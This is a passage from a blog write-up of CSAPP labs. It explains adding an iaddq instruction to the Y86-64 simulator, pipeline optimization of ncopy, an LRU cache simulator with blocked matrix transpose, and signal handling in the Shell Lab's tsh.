class="line"><span class="built_in">word</span> srcB = [</span><br><span class="line">  icode <span class="keyword">in</span> &#123; IOPQ, IRMMOVQ, IMRMOVQ, IIADDQ  &#125; : rB<span class="comment">;</span></span><br><span class="line">  icode <span class="keyword">in</span> &#123; IPUSHQ, IPOPQ, ICALL, <span class="keyword">IRET</span> &#125; : RRSP<span class="comment">;</span></span><br><span class="line">  <span class="number">1</span> : RNONE<span class="comment">;  # Don&#x27;t need register</span></span><br><span class="line">]<span class="comment">;</span></span><br><span class="line"></span><br><span class="line"># Write the result into the right-hand register (rB) of IIADDQ</span><br><span class="line"><span class="built_in">word</span> dstE = [</span><br><span class="line">  icode <span class="keyword">in</span> &#123; IRRMOVQ &#125; &amp;&amp; Cnd : rB<span class="comment">;</span></span><br><span class="line">  icode <span class="keyword">in</span> &#123; IIRMOVQ, IOPQ, IIADDQ&#125; : rB<span class="comment">;</span></span><br><span class="line">  icode <span class="keyword">in</span> &#123; IPUSHQ, IPOPQ, ICALL, <span class="keyword">IRET</span> &#125; : RRSP<span class="comment">;</span></span><br><span class="line">  <span class="number">1</span> : RNONE<span class="comment">;  # Don&#x27;t write any register</span></span><br><span class="line">]<span class="comment">;</span></span><br><span class="line"></span><br><span class="line"># The left ALU operand (aluA) of IIADDQ is the constant that was read (valC)</span><br><span class="line"><span class="built_in">word</span> aluA = [</span><br><span class="line">  icode <span class="keyword">in</span> &#123; IRRMOVQ, IOPQ &#125; : valA<span class="comment">;</span></span><br><span class="line">  icode <span class="keyword">in</span> &#123; IIRMOVQ, IRMMOVQ, IMRMOVQ, IIADDQ &#125; : valC<span class="comment">;</span></span><br><span class="line">  icode <span class="keyword">in</span> &#123; ICALL, IPUSHQ &#125; : -<span class="number">8</span><span class="comment">;</span></span><br><span 
class="line">  icode <span class="keyword">in</span> &#123; <span class="keyword">IRET</span>, IPOPQ &#125; : <span class="number">8</span><span class="comment">;</span></span><br><span class="line">  # Other instructions don<span class="string">&#x27;t need ALU</span></span><br><span class="line"><span class="string">];</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"># The right ALU operand (aluB) of IIADDQ is the value read from register rB (valB)</span></span><br><span class="line"><span class="string">word aluB = [</span></span><br><span class="line"><span class="string">  icode in &#123; IRMMOVQ, IMRMOVQ, IOPQ, ICALL, </span></span><br><span class="line"><span class="string">          IPUSHQ, IRET, IPOPQ, IIADDQ &#125; : valB;</span></span><br><span class="line"><span class="string">    # An interesting detail: storing an immediate into a register is done by computing immediate + 0 and then writing the result to the register</span></span><br><span class="line"><span class="string">  icode in &#123; IRRMOVQ, IIRMOVQ &#125; : 0;</span></span><br><span class="line"><span class="string">  # Other instructions don&#x27;</span>t need ALU</span><br><span class="line">]<span class="comment">;</span></span><br><span class="line"></span><br><span class="line"># IIADDQ may need to set the condition codes, similar to IOPQ</span><br><span class="line">bool set_cc = icode <span class="keyword">in</span> &#123; IOPQ, IIADDQ &#125;<span class="comment">;</span></span><br></pre></td></tr></table></figure></li><li><p>Once the instruction has been added, run the following</p>  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td 
class="code"><pre><span class="line"><span class="comment"># Build the new SEQ simulator. If make fails, the makefile may need to be modified</span></span><br><span class="line">make clean &amp;&amp; make VERSION=full</span><br><span class="line"><span class="comment"># Optional: test the iaddq instruction with a simple example</span></span><br><span class="line">./ssim -t ../y86-code/asumi.yo</span><br><span class="line"><span class="comment"># Optional: to debug, single-step with the GUI version of ssim</span></span><br><span class="line">./ssim -g ../y86-code/asumi.yo</span><br><span class="line"><span class="comment"># Optional: run the small test suite to test every instruction except iaddq.</span></span><br><span class="line"><span class="comment"># This serves two purposes</span></span><br><span class="line"><span class="comment">#   1. Check that the test tools run correctly</span></span><br><span class="line"><span class="comment">#   2. Check that the existing instructions were not accidentally broken</span></span><br><span class="line">(<span class="built_in">cd</span> ../y86-code; make testssim)</span><br><span class="line"><span class="comment"># Optional: run the large test suite to test every instruction except iaddq</span></span><br><span class="line">(<span class="built_in">cd</span> ../ptest; make SIM=../seq/ssim)</span><br><span class="line"><span class="comment"># Run the large test suite to test the iaddq instruction</span></span><br><span class="line">(<span class="built_in">cd</span> ../ptest; make SIM=../seq/ssim TFLAGS=-i)</span><br></pre></td></tr></table></figure><p>Screenshot of the <code>iaddq</code> tests passing:<br><img src="/2020/07/csapp-lab-writeup/seq_test.png" alt="img"></p></li><li><p>The build may fail with errors such as a missing <code>tk.h</code> header, a struct that has no member named <code>result</code>, or a link failure. These can be fixed as follows:</p><ul><li><p>First, before running <code>make</code>, modify parts of the <code>makefile</code></p><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span 
class="line"><span class="comment"># VERSION defaults to std; to build only the full version of ssim, change VERSION directly</span></span><br><span class="line">VERSION=full</span><br><span class="line"><span class="comment"># GUIMODE needs -DUSE_INTERP_RESULT, because a member of a Tcl/Tk struct has been deprecated;</span></span><br><span class="line"><span class="comment"># using it requires defining the USE_INTERP_RESULT macro</span></span><br><span class="line">GUIMODE=-DHAS_GUI -DUSE_INTERP_RESULT</span><br><span class="line"><span class="comment"># Set the tk/tcl version in use by appending the version number to each library flag, e.g. -ltk  =&gt;  -ltk8.6</span></span><br><span class="line">TKLIBS=-L/usr/lib -ltk8.6 -ltcl8.6</span><br><span class="line">TKINC=-isystem /usr/<span class="keyword">include</span>/tcl8.6</span><br><span class="line"></span><br><span class="line"><span class="comment"># ......</span></span><br></pre></td></tr></table></figure></li><li><p>Second, comment out lines 844 and 845 of <code>ssim.c</code></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* line 837 */</span>   <span class="meta">#<span class="keyword">ifdef</span> HAS_GUI</span></span><br><span class="line">                <span class="comment">/* ... 
*/</span></span><br><span class="line"><span class="comment">/* line 844 */</span>   <span class="comment">//extern int matherr();</span></span><br><span class="line"><span class="comment">/* line 845 */</span>   <span class="comment">//int *tclDummyMathPtr = (int *) matherr;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure></li></ul></li></ul><h3 id="3-Part-C">3) Part C</h3><ul><li><p>In this part, we modify <code>ncopy.ys</code> and <code>pipe-full.hcl</code> to make the code run faster</p></li><li><p>Once the code has been modified, run the following commands</p>  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#! /bin/sh</span></span><br><span class="line"><span class="comment">#   1. make builds the test cases and the pipeline simulator (psim); -s is quiet mode</span></span><br><span class="line"><span class="comment">#   2. correctness.pl runs more thorough tests to check that ncopy.ys is correct</span></span><br><span class="line"><span class="comment">#   3. ./benchmark.pl scores the running speed</span></span><br><span class="line"><span class="comment">#   4. 
Finally, check that the assembled ncopy code is no larger than 1k bytes (ncopy.ys is rejected if it exceeds 1k bytes)</span></span><br><span class="line">make VERSION=full -s &amp;&amp; ./correctness.pl &amp;&amp; ./benchmark.pl &amp;&amp; ../misc/yas ncopy.ys &amp;&amp; ./check-len.pl &lt; ncopy.yo</span><br></pre></td></tr></table></figure></li><li><p>Optimizations I made</p><ul><li>Implement <code>iaddq</code> in <code>pipe-full.hcl</code> and replace every instruction in <code>ncopy.ys</code> that <code>iaddq</code> can stand in for (including <code>sub</code> instructions where one operand is an immediate).<blockquote><p>CPE at this point: 12.70</p></blockquote></li><li>Unroll the loop into three separate loops with unrolling factors of <code>13, 5, 1</code>. Also separate the <strong>load</strong> and <strong>store</strong> instructions to reduce <strong>bubble</strong> insertion and pipeline stalls.<blockquote><p>CPE at this point: 8.84, for a score of 33.1/60.0</p></blockquote></li><li>Since I only unrolled the loop and did not explore deeper optimizations, the final score is 33.1</li></ul></li><li><p>The changes to <code>pipe-full.hcl</code> follow the same process as in Part B, so they are not repeated here; the code is on <a href="https://github.com/Kiprey/Skr_Learning/blob/master/week9-19/CSAPP-Lab/4.%20Arch%20Lab/part%20C/pipe-full.hcl">github</a>.<br>The <code>ncopy.ys</code> code is long, so it is also kept on <a href="https://github.com/Kiprey/Skr_Learning/blob/master/week9-19/CSAPP-Lab/4.%20Arch%20Lab/part%20C/ncopy.ys">github</a></p></li></ul><h2 id="5-Cache-Lab">5. 
Cache Lab</h2><h3 id="1-Part-A-2">1) Part A</h3><ul><li><p>In Part A, we write a cache simulator modeled on <code>csim-ref</code>. It simulates cache hits, misses, and evictions over a sequence of memory accesses, and uses the LRU replacement policy whenever a line must be evicted.</p></li><li><p>I took a shortcut and simply reverse-engineered csim-ref back into source code - <a href="https://github.com/Kiprey/Skr_Learning/blob/master/week9-19/CSAPP-Lab/5.%20Cache%20Lab/csim.c">github</a></p></li><li><p>The main cache data structures are as follows</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="type">long</span> <span class="type">long</span> <span class="type">unsigned</span> <span class="type">mem_addr_t</span>;</span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">cache_line_t</span>&#123;</span><br><span class="line">    <span class="type">mem_addr_t</span> tag;</span><br><span class="line">    <span class="type">int</span> valid;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> lru; </span><br><span class="line">&#125;;</span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> <span class="title class_">cache_line_t</span>* <span class="type">cache_set_t</span>;</span><br><span class="line"><span class="keyword">typedef</span> <span class="type">cache_set_t</span>* <span class="type">cache_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="type">cache_t</span> cache;</span><br></pre></td></tr></table></figure></li><li><p>Every access must update the LRU counter of the line it touches. If the requested data is not in the cache, a cache line must be evicted according to LRU.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">accessData</span><span class="params">(<span class="type">mem_addr_t</span> addr)</span></span></span><br><span class="line"><span 
class="function"></span>&#123;</span><br><span class="line">  <span class="type">int</span> eviction_line;</span><br><span class="line">  <span class="comment">// Note: unsigned, so -1 wraps to the maximum value</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span> eviction_lru = <span class="number">-1</span>;</span><br><span class="line">  eviction_line = <span class="number">0</span>;</span><br><span class="line">  <span class="type">mem_addr_t</span> tag = addr &gt;&gt; (s + b);</span><br><span class="line">  <span class="type">cache_set_t</span> cache_set = cache[(addr &gt;&gt; b) &amp; set_index_mask];</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Index of the cache_line holding the requested data</span></span><br><span class="line">  <span class="type">int</span> i;</span><br><span class="line">  <span class="keyword">for</span> (i = <span class="number">0</span>; ; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="comment">// Every cache_line in the set was scanned without finding the data</span></span><br><span class="line">    <span class="keyword">if</span> ( i &gt;= E )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="comment">// Cache miss</span></span><br><span class="line">      ++miss_count;</span><br><span class="line">      <span class="keyword">if</span> ( verbosity )</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;miss &quot;</span>);</span><br><span class="line">      <span class="comment">// Find the cache_line in this set to evict (smallest lru value)</span></span><br><span class="line">      <span class="keyword">for</span> (<span class="type">int</span> ia = <span class="number">0</span>; ia &lt; E; ++ia )</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="keyword">if</span> ( cache_set[ia].lru &lt; eviction_lru )</span><br><span class="line">        &#123;</span><br><span class="line">          eviction_line = 
ia;</span><br><span class="line">          eviction_lru = cache_set[ia].lru;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">      <span class="comment">// If the cache_line chosen for eviction is valid,</span></span><br><span class="line">      <span class="comment">// i.e. it holds previously loaded data rather than being an empty line</span></span><br><span class="line">      <span class="keyword">if</span> ( cache_set[eviction_line].valid )</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="comment">// Increment the eviction count</span></span><br><span class="line">        ++eviction_count;</span><br><span class="line">        <span class="keyword">if</span> ( verbosity )</span><br><span class="line">          <span class="built_in">printf</span>(<span class="string">&quot;eviction &quot;</span>);</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="comment">// Simulate loading the data into the cache_line that was just evicted (or was empty)</span></span><br><span class="line">      cache_set[eviction_line].valid = <span class="number">1</span>;</span><br><span class="line">      cache_set[eviction_line].tag = tag;</span><br><span class="line">      cache_set[eviction_line].lru = lru_counter++;</span><br><span class="line">      <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// Look for the data in the cache</span></span><br><span class="line">    <span class="keyword">if</span> ( cache_set[i].tag == tag &amp;&amp; cache_set[i].valid )</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// The data was found, so count a hit</span></span><br><span class="line">  ++hit_count;</span><br><span class="line">  <span class="keyword">if</span> ( verbosity )</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;hit 
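&quot;</span>);</span><br><span class="line">  cache_set[i].lru = lru_counter++;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h3 id="2-Part-B-2">2) Part B</h3><ul><li>In Part B we need to write a matrix transpose function that incurs as few cache misses as possible when it runs.</li><li>The test program runs the cache simulator with the parameters <code>-s 5 -E 1 -b 5</code>. That is, the cache is a <em>direct-mapped cache</em> with 32 cache lines, where each line holds 32 bytes of data, i.e. 8 values of type int.</li><li>Given this cache size, the cache can hold at most 8 rows of a 32x32 matrix at once. We can therefore split the 32x32 matrix into 8x8 blocks and transpose each block into the other matrix, which reduces the miss count enough to get full marks.</li><li>Likewise, the cache can hold at most 4 rows of a 64x64 matrix, so splitting the 64x64 matrix into 4x4 blocks and transposing them lowers the miss count considerably.<blockquote><p>The earlier 8x8 blocking no longer works here: rows that are 4 apart map to the same cache sets, so accesses inside a block conflict with each other and increase the miss count.<br>Note that 4x4 blocking uses only half of each cache line it loads, wasting half of the cache space, so it is not the optimal solution for the 64x64 matrix, but it is the best one I could come up with.</p></blockquote></li><li>As for the 61x67 matrix, the test program relaxes the miss limit, so splitting the matrix into 16x16 blocks is enough for full marks.</li><li>Part B also limits the number of temporary variables to at most 12. To reduce misses further, it is best to read an entire cache line into temporary variables in one go; then, even if that line is evicted afterwards, its data does not have to be loaded into the cache again, which saves misses.</li><li>My final implementation - <a href="https://github.com/Kiprey/Skr_Learning/blob/master/week9-19/CSAPP-Lab/5.%20Cache%20Lab/trans.c">github</a></li></ul><h3 id="3-测试">3) Testing</h3><ul><li>Run the tests with <code>make &amp;&amp; ./driver.py</code>. My results are shown below.<br><img src="/2020/07/csapp-lab-writeup/cache_lab_partB.png" alt="img"></li></ul><h2 id="6-Shell-Lab">6. 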
Shell Lab</h2><ul><li><p>In this lab we need to complete <code>tsh.c</code> to build a simple shell. Before starting, it is best to fully understand Chapter 8, Exceptional Control Flow.</p></li><li><p>A few points need attention while writing it:</p><ul><li><p>Avoid race conditions.</p><ul><li><p>If the child process terminates after tsh calls <code>fork</code> but before it calls <code>addjob</code>, the resulting <code>SIGCHLD</code> signal makes tsh jump to the signal handler and run <code>deletejob</code> first.</p></li><li><p>The execution order then becomes <code>deletejob</code>-&gt;<code>addjob</code>, which leaves behind a job that is never removed, even though the process it refers to has already terminated.</p></li><li><p>So before calling <code>fork</code> we block the signals that could cause the race, and only handle them after <code>addjob</code> has completed.</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="built_in">sigemptyset</span>(&amp;set) &lt; <span class="number">0</span>)</span><br><span class="line">    <span class="built_in">unix_error</span>(<span class="string">&quot;sigemptyset error&quot;</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="built_in">sigaddset</span>(&amp;set, SIGINT) &lt; <span class="number">0</span> || <span class="built_in">sigaddset</span>(&amp;set, SIGTSTP) &lt; <span class="number">0</span> || <span class="built_in">sigaddset</span>(&amp;set, SIGCHLD) &lt; <span class="number">0</span>)</span><br><span class="line">    <span class="built_in">unix_error</span>(<span class="string">&quot;sigaddset error&quot;</span>);</span><br><span class="line"><span class="comment">// Before fork, block SIGCHLD (plus SIGINT and SIGTSTP) to prevent the race</span></span><br><span class="line"><span class="keyword">if</span>(<span class="built_in">sigprocmask</span>(SIG_BLOCK, &amp;set, <span class="literal">NULL</span>) &lt; <span class="number">0</span>)</span><br><span class="line">    <span class="built_in">unix_error</span>(<span class="string">&quot;sigprocmask 
error&quot;</span>);</span><br></pre></td></tr></table></figure></li><li><p>A child created by <code>fork</code> inherits the parent's set of blocked signals, so the child must unblock those signals again before it runs the new program.</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>((pid = fork()) &lt; <span class="number">0</span>)</span><br><span class="line">    <span class="built_in">unix_error</span>(<span class="string">&quot;fork error&quot;</span>);</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">if</span>(pid == <span class="number">0</span>)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="comment">// Control flow of the child process starts here</span></span><br><span class="line">  <span class="keyword">if</span>(<span class="built_in">sigprocmask</span>(SIG_UNBLOCK, &amp;set, <span class="literal">NULL</span>) &lt; <span class="number">0</span>)</span><br><span class="line">      <span class="built_in">unix_error</span>(<span class="string">&quot;sigprocmask error&quot;</span>);</span><br><span class="line">  <span class="keyword">if</span>(<span class="built_in">setpgid</span>(<span class="number">0</span>, <span class="number">0</span>) &lt; <span class="number">0</span>)</span><br><span class="line">      <span class="built_in">unix_error</span>(<span class="string">&quot;setpgid error&quot;</span>);</span><br><span class="line">  <span class="keyword">if</span>(<span class="built_in">execve</span>(argv[<span class="number">0</span>], argv, environ) &lt; <span 
class="number">0</span>)&#123;</span><br><span class="line">      <span class="built_in">printf</span>(<span class="string">&quot;%s: command not found\n&quot;</span>, argv[<span class="number">0</span>]);</span><br><span class="line">      <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li><li><p>Signals are not queued</p><ul><li><p>If several child processes terminate at about the same time and each raises <code>SIGCHLD</code>, the tsh main process may receive only one signal instead of several.</p></li><li><p>The reason is that pending signals are not queued: while a signal of a given type is already pending (for example because that type is blocked while its handler runs), further signals of the same type are simply discarded.</p></li><li><p>So when reaping children, the handler should loop and reap as many processes as possible.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Inside sigchld_handler</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">Wait for all child processes without blocking</span></span><br><span class="line"><span class="comment">wai